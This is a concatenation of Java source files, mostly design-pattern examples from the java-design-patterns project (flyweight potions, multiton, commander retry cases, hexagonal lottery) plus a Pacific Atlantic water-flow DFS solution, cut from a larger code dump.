* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.flyweight;
import lombok.extern.slf4j.Slf4j;
/**
* HolyWaterPotion.
*/
@Slf4j
public class HolyWaterPotion implements Potion {
@Override
public void drink() {
LOGGER.info("You feel blessed. (Potion={})", System.identityHashCode(this));
}
}
| smedals/java-design-patterns | flyweight/src/main/java/com/iluwatar/flyweight/HolyWaterPotion.java |
1,033 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.flyweight;
/**
* Enumeration for potion types.
*/
public enum PotionType {
HEALING, INVISIBILITY, STRENGTH, HOLY_WATER, POISON
}
| smedals/java-design-patterns | flyweight/src/main/java/com/iluwatar/flyweight/PotionType.java |
1,034 | // Given an m x n matrix of non-negative integers representing the height of each unit cell in a continent, the "Pacific ocean" touches the left and top edges of the matrix and the "Atlantic ocean" touches the right and bottom edges.
// Water can only flow in four directions (up, down, left, or right) from a cell to another one with height equal or lower.
// Find the list of grid coordinates where water can flow to both the Pacific and Atlantic ocean.
// Note:
// The order of returned grid coordinates does not matter.
// Both m and n are less than 150.
// Example:
// Given the following 5x5 matrix:
// Pacific ~ ~ ~ ~ ~
// ~ 1 2 2 3 (5) *
// ~ 3 2 3 (4) (4) *
// ~ 2 4 (5) 3 1 *
// ~ (6) (7) 1 4 5 *
// ~ (5) 1 1 2 4 *
// * * * * * Atlantic
// Return:
// [[0, 4], [1, 3], [1, 4], [2, 2], [3, 0], [3, 1], [4, 0]] (positions with parentheses in the above matrix).
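// Approach (descriptive comment): rather than simulating flow outward from every cell, run a DFS inward from each
// ocean's border cells, only stepping to neighbours whose height is greater than or equal to the current cell's; a cell
// marked reachable by both sweeps can drain to both oceans.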
import java.util.LinkedList;
import java.util.List;
public class PacificAtlanticWaterFlow {
public List<int[]> pacificAtlantic(int[][] matrix) {
List<int[]> result = new LinkedList<>();
//error checking
if(matrix == null || matrix.length == 0 || matrix[0].length == 0) {
return result;
}
int n = matrix.length;
int m = matrix[0].length;
boolean[][] pacific = new boolean[n][m];
boolean[][] atlantic = new boolean[n][m];
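        //run dfs inward from the ocean borders: the left column touches the Pacific, the right column the Atlantic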
for(int i = 0; i < n; i++) {
dfs(matrix, pacific, Integer.MIN_VALUE, i, 0);
dfs(matrix, atlantic, Integer.MIN_VALUE, i, m - 1);
}
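        //the top row touches the Pacific, the bottom row the Atlantic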
for(int i = 0; i < m; i++) {
dfs(matrix, pacific, Integer.MIN_VALUE, 0, i);
dfs(matrix, atlantic, Integer.MIN_VALUE, n - 1, i);
}
for(int i = 0; i < n; i++) {
for(int j = 0; j < m; j++) {
if(pacific[i][j] && atlantic[i][j]) {
result.add(new int[] {i, j});
}
}
}
return result;
}
public void dfs(int[][] matrix, boolean[][] visited, int height, int x, int y) {
int n = matrix.length;
int m = matrix[0].length;
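        //stop at the grid edge, at cells already visited, or when the current cell is lower than the previous one (water could not flow here from there)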
if(x < 0 || x >= n || y < 0 || y >= m || visited[x][y] || matrix[x][y] < height) {
return;
}
visited[x][y] = true;
dfs(matrix, visited, matrix[x][y], x + 1, y);
dfs(matrix, visited, matrix[x][y], x - 1, y);
dfs(matrix, visited, matrix[x][y], x, y + 1);
dfs(matrix, visited, matrix[x][y], x, y - 1);
}
}
| kdn251/interviews | company/google/PacificAtlanticWaterFlow.java |
1,041 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.flyweight;
import java.util.List;
import lombok.extern.slf4j.Slf4j;
/**
* AlchemistShop holds potions on its shelves. It uses PotionFactory to provide the potions.
*/
@Slf4j
public class AlchemistShop {
private final List<Potion> topShelf;
private final List<Potion> bottomShelf;
/**
* Constructor.
*/
public AlchemistShop() {
var factory = new PotionFactory();
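    //the flyweight factory shares potion instances, so the shelves may hold the same object several times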
topShelf = List.of(
factory.createPotion(PotionType.INVISIBILITY),
factory.createPotion(PotionType.INVISIBILITY),
factory.createPotion(PotionType.STRENGTH),
factory.createPotion(PotionType.HEALING),
factory.createPotion(PotionType.INVISIBILITY),
factory.createPotion(PotionType.STRENGTH),
factory.createPotion(PotionType.HEALING),
factory.createPotion(PotionType.HEALING)
);
bottomShelf = List.of(
factory.createPotion(PotionType.POISON),
factory.createPotion(PotionType.POISON),
factory.createPotion(PotionType.POISON),
factory.createPotion(PotionType.HOLY_WATER),
factory.createPotion(PotionType.HOLY_WATER)
);
}
/**
* Get a read-only list of all the items on the top shelf.
*
* @return The top shelf potions
*/
public final List<Potion> getTopShelf() {
return List.copyOf(this.topShelf);
}
/**
* Get a read-only list of all the items on the bottom shelf.
*
* @return The bottom shelf potions
*/
public final List<Potion> getBottomShelf() {
return List.copyOf(this.bottomShelf);
}
/**
* Drink all the potions.
*/
public void drinkPotions() {
LOGGER.info("Drinking top shelf potions");
topShelf.forEach(Potion::drink);
LOGGER.info("Drinking bottom shelf potions");
bottomShelf.forEach(Potion::drink);
}
}
| smedals/java-design-patterns | flyweight/src/main/java/com/iluwatar/flyweight/AlchemistShop.java |
1,047 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.multiton;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import lombok.Getter;
/**
* Nazgul is a Multiton class. Nazgul instances can be queried using {@link #getInstance} method.
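 *
 * <p>For example, {@code Nazgul.getInstance(NazgulName.KHAMUL)} always returns the same shared
 * instance for that name.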
*/
public final class Nazgul {
private static final Map<NazgulName, Nazgul> nazguls;
@Getter
private final NazgulName name;
static {
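  //eagerly create one Nazgul per name and register it so that getInstance can return the shared instance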
nazguls = new ConcurrentHashMap<>();
nazguls.put(NazgulName.KHAMUL, new Nazgul(NazgulName.KHAMUL));
nazguls.put(NazgulName.MURAZOR, new Nazgul(NazgulName.MURAZOR));
nazguls.put(NazgulName.DWAR, new Nazgul(NazgulName.DWAR));
nazguls.put(NazgulName.JI_INDUR, new Nazgul(NazgulName.JI_INDUR));
nazguls.put(NazgulName.AKHORAHIL, new Nazgul(NazgulName.AKHORAHIL));
nazguls.put(NazgulName.HOARMURATH, new Nazgul(NazgulName.HOARMURATH));
nazguls.put(NazgulName.ADUNAPHEL, new Nazgul(NazgulName.ADUNAPHEL));
nazguls.put(NazgulName.REN, new Nazgul(NazgulName.REN));
nazguls.put(NazgulName.UVATHA, new Nazgul(NazgulName.UVATHA));
}
private Nazgul(NazgulName name) {
this.name = name;
}
public static Nazgul getInstance(NazgulName name) {
return nazguls.get(name);
}
}
| iluwatar/java-design-patterns | multiton/src/main/java/com/iluwatar/multiton/Nazgul.java |
1,057 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.masterworker;
/**
* Class ArrayResult extends abstract class {@link Result} and contains data of type int[][].
*/
public class ArrayResult extends Result<int[][]> {
public ArrayResult(int[][] data) {
super(data);
}
}
| iluwatar/java-design-patterns | master-worker/src/main/java/com/iluwatar/masterworker/ArrayResult.java |
1,059 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.commander;
import com.iluwatar.commander.employeehandle.EmployeeDatabase;
import com.iluwatar.commander.employeehandle.EmployeeHandle;
import com.iluwatar.commander.exceptions.DatabaseUnavailableException;
import com.iluwatar.commander.exceptions.PaymentDetailsErrorException;
import com.iluwatar.commander.messagingservice.MessagingDatabase;
import com.iluwatar.commander.messagingservice.MessagingService;
import com.iluwatar.commander.paymentservice.PaymentDatabase;
import com.iluwatar.commander.paymentservice.PaymentService;
import com.iluwatar.commander.queue.QueueDatabase;
import com.iluwatar.commander.shippingservice.ShippingDatabase;
import com.iluwatar.commander.shippingservice.ShippingService;
/**
* AppPaymentFailCases class looks at possible cases when Payment service is available/unavailable.
*/
public class AppPaymentFailCases {
private static final RetryParams retryParams = RetryParams.DEFAULT;
private static final TimeLimits timeLimits = TimeLimits.DEFAULT;
void paymentNotPossibleCase() {
var ps = new PaymentService(new PaymentDatabase(), new DatabaseUnavailableException(),
new PaymentDetailsErrorException());
var ss = new ShippingService(new ShippingDatabase());
var ms = new MessagingService(new MessagingDatabase(), new DatabaseUnavailableException());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase(new DatabaseUnavailableException());
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
void paymentDatabaseUnavailableCase() {
//rest is successful
var ps = new PaymentService(new PaymentDatabase(), new DatabaseUnavailableException(),
new DatabaseUnavailableException(), new DatabaseUnavailableException(),
new DatabaseUnavailableException(), new DatabaseUnavailableException(),
new DatabaseUnavailableException());
var ss = new ShippingService(new ShippingDatabase());
var ms = new MessagingService(new MessagingDatabase());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase();
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
void paymentSuccessCase() {
    //payment succeeds after two database retries and then moves on to messaging - rest is successful for now
var ps = new PaymentService(new PaymentDatabase(), new DatabaseUnavailableException(),
new DatabaseUnavailableException());
var ss = new ShippingService(new ShippingDatabase());
var ms =
new MessagingService(new MessagingDatabase(), new DatabaseUnavailableException());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase(new DatabaseUnavailableException());
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
/**
* Program entry point.
*
* @param args command line args
*/
public static void main(String[] args) {
var apfc = new AppPaymentFailCases();
apfc.paymentSuccessCase();
}
} | iluwatar/java-design-patterns | commander/src/main/java/com/iluwatar/commander/AppPaymentFailCases.java |
1,060 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.commander;
import com.iluwatar.commander.employeehandle.EmployeeDatabase;
import com.iluwatar.commander.employeehandle.EmployeeHandle;
import com.iluwatar.commander.exceptions.DatabaseUnavailableException;
import com.iluwatar.commander.exceptions.ItemUnavailableException;
import com.iluwatar.commander.exceptions.ShippingNotPossibleException;
import com.iluwatar.commander.messagingservice.MessagingDatabase;
import com.iluwatar.commander.messagingservice.MessagingService;
import com.iluwatar.commander.paymentservice.PaymentDatabase;
import com.iluwatar.commander.paymentservice.PaymentService;
import com.iluwatar.commander.queue.QueueDatabase;
import com.iluwatar.commander.shippingservice.ShippingDatabase;
import com.iluwatar.commander.shippingservice.ShippingService;
/**
* AppShippingFailCases class looks at possible cases when Shipping service is
* available/unavailable.
*/
public class AppShippingFailCases {
private static final RetryParams retryParams = RetryParams.DEFAULT;
private static final TimeLimits timeLimits = TimeLimits.DEFAULT;
void itemUnavailableCase() {
var ps = new PaymentService(new PaymentDatabase());
var ss = new ShippingService(new ShippingDatabase(), new ItemUnavailableException());
var ms = new MessagingService(new MessagingDatabase());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase();
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
void shippingNotPossibleCase() {
var ps = new PaymentService(new PaymentDatabase());
var ss = new ShippingService(new ShippingDatabase(), new ShippingNotPossibleException());
var ms = new MessagingService(new MessagingDatabase());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase();
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
void shippingDatabaseUnavailableCase() {
//rest is successful
var ps = new PaymentService(new PaymentDatabase());
var ss = new ShippingService(new ShippingDatabase(), new DatabaseUnavailableException(),
new DatabaseUnavailableException(), new DatabaseUnavailableException(),
new DatabaseUnavailableException(), new DatabaseUnavailableException(),
new DatabaseUnavailableException());
var ms = new MessagingService(new MessagingDatabase());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase();
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
void shippingSuccessCase() {
    //shipping succeeds after two database retries and then moves on to payment - rest is successful for now
var ps = new PaymentService(new PaymentDatabase(), new DatabaseUnavailableException());
var ss = new ShippingService(new ShippingDatabase(), new DatabaseUnavailableException(),
new DatabaseUnavailableException());
var ms = new MessagingService(new MessagingDatabase(), new DatabaseUnavailableException());
var eh = new EmployeeHandle(new EmployeeDatabase());
var qdb = new QueueDatabase();
var c = new Commander(eh, ps, ss, ms, qdb, retryParams, timeLimits);
var user = new User("Jim", "ABCD");
var order = new Order(user, "book", 10f);
c.placeOrder(order);
}
/**
* Program entry point.
*
* @param args command line args
*/
public static void main(String[] args) {
var asfc = new AppShippingFailCases();
asfc.shippingSuccessCase();
}
} | iluwatar/java-design-patterns | commander/src/main/java/com/iluwatar/commander/AppShippingFailCases.java |
1,062 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.domain;
import com.iluwatar.hexagonal.database.LotteryTicketRepository;
import com.iluwatar.hexagonal.domain.LotteryTicketCheckResult.CheckResult;
/**
* Lottery utilities.
*/
public class LotteryUtils {
private LotteryUtils() {
}
/**
* Checks if lottery ticket has won.
*/
public static LotteryTicketCheckResult checkTicketForPrize(
LotteryTicketRepository repository,
LotteryTicketId id,
LotteryNumbers winningNumbers
) {
var optional = repository.findById(id);
if (optional.isPresent()) {
if (optional.get().lotteryNumbers().equals(winningNumbers)) {
return new LotteryTicketCheckResult(CheckResult.WIN_PRIZE, 1000);
} else {
return new LotteryTicketCheckResult(CheckResult.NO_PRIZE);
}
} else {
return new LotteryTicketCheckResult(CheckResult.TICKET_NOT_SUBMITTED);
}
}
}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/domain/LotteryUtils.java |
1,063 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.factory.method;
/**
* OrcWeapon.
*/
public record OrcWeapon(WeaponType weaponType) implements Weapon {
@Override
public String toString() {
return "an orcish " + weaponType;
}
}
| iluwatar/java-design-patterns | factory-method/src/main/java/com/iluwatar/factory/method/OrcWeapon.java |
1,065 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.domain;
/**
* Immutable value object containing lottery player details.
*/
public record PlayerDetails(String email, String bankAccount, String phoneNumber) {}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/domain/PlayerDetails.java |
1,066 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.eda.model;
import com.iluwatar.eda.event.UserCreatedEvent;
import com.iluwatar.eda.event.UserUpdatedEvent;
/**
* This {@link User} class is a basic pojo used to demonstrate user data sent along with the {@link
* UserCreatedEvent} and {@link UserUpdatedEvent} events.
*/
public record User(String username) {}
| iluwatar/java-design-patterns | event-driven-architecture/src/main/java/com/iluwatar/eda/model/User.java |
1,067 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.flyweight;
import java.util.EnumMap;
import java.util.Map;
/**
* PotionFactory is the Flyweight in this example. It minimizes memory use by sharing object
* instances. It holds a map of potion instances and new potions are created only when none of the
* type already exists.
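 *
 * <p>For example, requesting {@code PotionType.HEALING} twice returns the same shared
 * {@code HealingPotion} instance.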
*/
public class PotionFactory {
private final Map<PotionType, Potion> potions;
public PotionFactory() {
potions = new EnumMap<>(PotionType.class);
}
Potion createPotion(PotionType type) {
var potion = potions.get(type);
if (potion == null) {
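      //no shared instance of this type exists yet, so create one and cache it for later requests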
switch (type) {
case HEALING -> potion = new HealingPotion();
case HOLY_WATER -> potion = new HolyWaterPotion();
case INVISIBILITY -> potion = new InvisibilityPotion();
case POISON -> potion = new PoisonPotion();
case STRENGTH -> potion = new StrengthPotion();
default -> {
}
}
if (potion != null) {
potions.put(type, potion);
}
}
return potion;
}
}
| rajprins/java-design-patterns | flyweight/src/main/java/com/iluwatar/flyweight/PotionFactory.java |
1,070 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
